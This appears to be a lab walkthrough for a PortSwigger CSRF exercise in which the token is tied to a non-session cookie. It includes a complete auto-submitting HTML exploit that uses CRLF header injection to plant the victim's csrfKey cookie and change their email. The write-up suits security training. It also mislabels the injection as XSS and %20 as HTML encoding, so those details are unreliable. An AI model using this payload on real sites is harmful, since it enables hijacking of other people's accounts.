This lab's email change functionality is vulnerable to CSRF. It uses tokens to try to prevent CSRF attacks, but they aren't fully integrated into the site's session handling system.

To solve the lab, use your exploit server to host an HTML page that uses a [CSRF attack](https://portswigger.net/web-security/csrf) to change the viewer's email address.

You have two accounts on the application that you can use to help design your attack. The credentials are as follows:

-   `wiener:peter`
-   `carlos:montoya`

# Practical 
So we have two credentials, let's login one on Chromium and one other in Burp's browser.
This time we have two cookies, one is for sessions and one other is csrfKey

So let's start changing email and swapping stuff to see what happens, first let's try swapping the csrfKey.
```txt
Invalid CSRF token.
```
Okay how about if we change the csrfKey and the CSRF token.
```txt
HTTP 1.1/ 302 Found
```
And the request went through, so we need to change/set the csrfKey of our victim. Luckily we have XSS on this page so we could do that.
Let's start crafting our payload.
One thing that you need to know though is about CRLF injection. We'll be using that to set cookies for our victim. 

Link for CRLF :
* https://www.geeksforgeeks.org/crlf-injection-attack/

Let's craft our payload.
```html
<html>
  <body>
    <form action="https://ac1c1f4d1e04a5d480880d4b005c00b2.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="pwned@evil-user.net" />
      <input type="hidden" name="csrf" value="03184LrAB071hjhSsmV5EtybMuqCkGHu"/>
    </form>
    <img src="https://ac1c1f4d1e04a5d480880d4b005c00b2.web-security-academy.net/?search=hi%0d%0aSet-Cookie:%20csrfKey=DmGtsM5asmIi49nMl9ygvMLuX3z8XHz8" onerror=
"document.forms[0].submit()";>
  </body>
</html>
```
So replace the values with our values and send the exploit to the victim. **%0a** and **%0d** are both used for CRLF injection. %20 is just a space in HTML encoding.

And we solved the lab and changed the email for user wiener!
